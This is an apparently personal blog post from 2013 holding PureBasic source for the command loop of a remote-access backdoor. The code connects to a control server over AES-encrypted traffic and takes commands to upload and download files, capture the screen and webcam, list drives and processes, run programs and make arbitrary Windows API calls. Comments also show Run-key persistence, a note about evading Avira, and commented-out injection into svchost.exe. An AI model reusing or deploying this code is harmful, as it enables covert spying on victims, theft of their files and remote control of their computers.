2013年6月18日 星期二

g_door loop



Repeat
  ConnectionID.l = OpenNetworkConnection(#domain, #port)
  If  ConnectionID  
    Debug("Connect to Server")
    Debug ConnectionID
    status=0
    SendAes("pas"+#pass+#endstr)
    Repeat 
     
      SEvent = NetworkClientEvent(ConnectionID)
      If SEvent       
      
        timer=0
        Select SEvent
          Case #PB_NetworkEvent_Data                      
            reclen=ReceiveNetworkData(ConnectionID.l, *Buffer, 8192)
           
            Select status
              Case 1
                If Eof(filehandle)               
                  CloseFile(filehandle)
                  status=0
                 
                  If img=1 And GetPathPart(filepath)=GetTemporaryDirectory()
                    DeleteFile(filepath)
                    img=0
                  EndIf
                  filepath=""
               
              Else
                ;Debug reclen
                ;readlen=ReadData(filehandle,*Buffer2+3,1457)
                readlen=ReadData(filehandle,*Buffer2,8192)
                AESEncoder(*Buffer2, @Aes\Data(), readlen, ?Key, 128, ?InitializationVector)
                SendNetworkData(ConnectionID,@Aes\Data(),readlen)
                ;SendNetworkData(ConnectionID,*Buffer2,readlen)
               
               
                EndIf
              Case 2
               
                CopyMemory(*Buffer,*Buffer2+buflen,reclen)
                buflen=buflen+reclen
                ;Debug buflen
                Delay(1)
               
                If buflen=8192 Or nowfilesize+buflen=FileSize
                  nowfilesize=nowfilesize+buflen
                  AESDecoder(*Buffer2, @Aes\Data(), buflen, ?Key, 128, ?InitializationVector)
                  WriteData(filehandle, @Aes\Data(), buflen)
                  buflen=0
                  If nowfilesize=FileSize
                    CloseFile(filehandle)
                    nowfilesize=0
                   
                    status=0
                  Else
                    SendAes("ok!"+#endstr)
                  EndIf
                EndIf
              Default
                Debug PeekS(*Buffer,reclen)
                ;Debug   AesDec(*Buffer,reclen)
                If reclen >=16
                cmdstr.s=AesDec(*Buffer,reclen)               
                ;If PeekS(*Buffer+reclen-2,2) = #endstr And reclen > 5
                If Mid(cmdstr,Len(cmdstr)-1) = #endstr And Len(cmdstr) > 5
                  Debug cmdstr+"<-"
                  command.l=1
                EndIf
                EndIf
            EndSelect
          Case #PB_NetworkEvent_Disconnect
            Debug("disconnect")
            Quit = 1
           
        EndSelect
       
     
      If command
      
        cmdstr.s=StringField(cmdstr, CountString( cmdstr, #endstr), #endstr)
        Debug cmdstr
        Select Mid(cmdstr,1,3)
          Case "get"
            filepath=Mid(cmdstr,5)      
            filehandle= ReadFile(#PB_Any,filepath)
            If filehandle
              readlen=ReadData(filehandle,*Buffer2,8192)
              AESEncoder(*Buffer2, @Aes\Data(), readlen, ?Key, 128, ?InitializationVector)
              SendNetworkData(ConnectionID,@Aes\Data(),readlen)
             
              status=1
            Else              
              SendAes("errfile,can't read file"+#endstr)             
            EndIf
          Case "put"
            cmdstr=Mid(cmdstr,5)
            Debug StringField(cmdstr,1,"|")
            filehandle=CreateFile(#PB_Any,StringField(cmdstr,1,"|"))
            filesize=Val(StringField(cmdstr,2,"|"))
            buflen=0
            If filehandle             
             
              status=2
              SendAes("ok!"+#endstr)
             
            Else              
              SendAes("errfile,can't create file"+#endstr)             
            EndIf
          Case "pak"
            filepath=Mid(cmdstr,5) 
            file.s=GetTemporaryDirectory()+"~"+FormatDate("%hh%ii%ss", Date())+".tmp"
            CreatePack(file)
            AddPackFile(filepath,9)           
            ClosePack()
            file=file+"|"+Str(FileSize(file))
            SendAes("pak"+file+#endstr)
            img=1
          Case "img"
            file.s=CaptureScreen()
            If file<>""
              file=file+"|"+Str(FileSize(file))
              SendAes("img"+file+#endstr) 
              img=1
            EndIf
          Case "cam"
            file.s=CapWebcam(1)
            If file <> "" And file <> "no"
              file=file+"|"+Str(FileSize(file))
              SendAes("img"+file+#endstr) 
              img=1
            EndIf
           
          Case "drv"
            GetAllDrives(Drive())
            drvstr.s="drv"
            ForEach Drive()
              drvstr.s=drvstr+Drive()\DriveLetter$  + ":" + Trim(Drive()\Volume$)+"|"
            Next
            SendAes(drvstr+#endstr)         
            Debug drvstr+"->"           
            ClearList(Drive())
          Case  "dir"
            ListFile(Dir(),Mid(cmdstr,5))
            dirstr.s="dir"
            ForEach Dir()
              dirstr=dirstr+Dir()\Name$  + ":" + Dir()\Size$+ ":" + Str(Dir()\DirType)+"|"
            Next
           
            If Len(dirstr)<8187
             
              SendAes(dirstr+#endstr)
              Debug dirstr+"->"
             
            Else
              SendAes("errdir,too many data"+#endstr)
            EndIf
            ClearList(Dir())
           
          Case "del"
            If DeleteFile(Mid(cmdstr,5))=0
             
              SendAes("errdel,can't delete file"+#endstr)
            Else
              SendAes("del"+#endstr)
             
            EndIf 
           
            Debug "del->"
          Case "cpy"           
           
            CopyFile(StringField(Mid(cmdstr,5),1,"|"),StringField(Mid(cmdstr,5),2,"|"))
           
          Case "exe" ;kill by avira
            ;             If RunProgram(Mid(cmdstr,5))=0
            ;               SendNetworkString(ConnectionID,"errexe,can't execute file"+#endstr)
            ;             Else
            ;               SendNetworkString(ConnectionID,"exe"+#endstr);              
            ;             EndIf
            ;             Debug "del->"
           
            If Val(StringField(apicall("6|Shell32.dll|ShellExecuteA|0|0|@"+Mid(cmdstr,5)+"|0|0|1"),1,"|"))>32
              SendAes("exe"+#endstr)
            Else
              SendAes("errexe,can't execute file"+#endstr)
            EndIf
           
          Case "kil"
;             If PurePROCS_KillProcessID(Val(Mid(cmdstr,5)))=0
;               SendAes("errkil,can't kill process"+#endstr)
;             Else
;               SendAes("kil"+#endstr)            
;             EndIf
            Debug "kil->"
           
;           Case "pas"
;             SendNetworkString(ConnectionID,"pas"+#pass+#endstr)
;             Debug "pas"+#pass+#endstr+"->"
          Case "inf"
            inf.s="inf"
            buf.s=Space(256)
            buflen.l=256
            GetComputerName_(@buf,@buflen)
            inf=inf+buf+"|"
            GetUserName_(@buf,@buflen)
            inf=inf+buf+"|"
            inf=inf+os             
            inf=inf+av+ProgramFilename()+"|"+#ver+"|"+#hash+"|"
            If CapWebcam(0)="no"
              inf=inf+"no"+"|"
            Else
              inf=inf+"yes"+"|"
            EndIf 
            SendAes(inf+#endstr)          
           
          Case "chd"
            SetCurrentDirectory_(Mid(cmdstr,5))         
           
           
          Case "api"
           
            ;s: output string, v: output value
            ;api USER32.DLL|MessageBoxA|0|hello world 1|test|0
            ;Debug apicall("4|USER32.DLL|MessageBoxA|0|@hello world 1|@test|0")
            ;Debug apicall("2|Kernel32.dll|GetWindowsDirectoryA|s|512")
            ;Debug apicall("2|Kernel32.dll|GetTempPathA|512|s")
            ;Debug apicall("3|Advapi32.dll|RegOpenKeyA|2147483650|@SOFTWARE\Microsoft\Windows\CurrentVersion\Run|v")
            ;Debug apicall("6|Advapi32.dll|RegSetValueExA|handle_number|@WindowsInit|0|1|@c:\windows\test.exe|19")
            ;Debug apicall("6|Shell32.dll|ShellExecuteA|0|0|@notepad.exe|0|0|1") 
            ;debug apicall("2|Kernel32.dll|GetComputerNameA|s|v256")
            SendAes("api"+apicall(Mid(cmdstr,5))+#endstr)
           
          Case "prs"
            ;Debug "process"
            ;ListProcess(Process())
            GetProcessList(Process())
            procstr.s="prs"
            ForEach Process()
              ;drvstr.s=drvstr+Drive()\DriveLetter$  + ":" + Trim(Drive()\Volume$)+"|"
              procstr=procstr+Process()\path + "&" + Process()\pid + "&" + Process()\module + "|"
            Next
            If Len(procstr)<8187
              SendAes(procstr+#endstr)
              Debug procstr+"->"             
            Else
              SendAes("errprs,too many data"+#endstr)
            EndIf
            ClearList(Process())
          Case "sup"
            SendAes(#sup_cmd+#endstr)
         
        EndSelect
       
        PokeS(*Buffer,"   ")
        timer=0
        command=0
       
      EndIf
     
      Else
     
      timer=timer+1
;       If timer % 1000=0
;         Debug ".."
;        EndIf
      If status=0
       
        If timer=1000
;             AesEnc("000"+#endstr)
;             SendNetworkData(ConnectionID,@Aes\Data(),Aes\len)
            SendAes("000"+#endstr)
         
        EndIf       
  
      EndIf
      
      If timer=#delaytime2
        Debug("server die")
        Debug timer
        CloseNetworkConnection(ConnectionID)
        timer=0
        quit=1
       
       
       
        status=-1
        If IsFile(filehandle)
          CloseFile(filehandle)
                
        EndIf       
      EndIf
    EndIf
    Delay(1)
    Until quit=1
    quit=0
   
  Else
    Debug("can not Connect to Server")
  EndIf 
  Delay(#delaytime1)
 
  ;   If para<>""
  ;     RenameFile("c:\"+para,"c:\winlogin.exe")
  ;    
  ;     para=""
  ;     Stream = ReadFile(#PB_Any, GetEnvironmentVariable("windir") + "\notepad.exe")
  ;     If Stream
  ;       *Buffer = AllocateMemory(Lof(Stream))
  ;       If *Buffer
  ;         ReadData(Stream, *Buffer, Lof(Stream))
  ;         CloseFile(Stream)
  ;         ProcessID = PurePROCS_Execute("c:\windows\system32\svchost.exe", *Buffer)
  ;         Delay(10000)
  ;         PurePROCS_KillProcessID(ProcessID)
  ;         ProcessID = PurePROCS_Execute("c:\windows\system32\svchost.exe", *Buffer)
  ;         Delay(10000)
  ;         PurePROCS_KillProcessID(ProcessID)
  ;       EndIf
  ;     EndIf
  ;   EndIf
ForEver

沒有留言:

張貼留言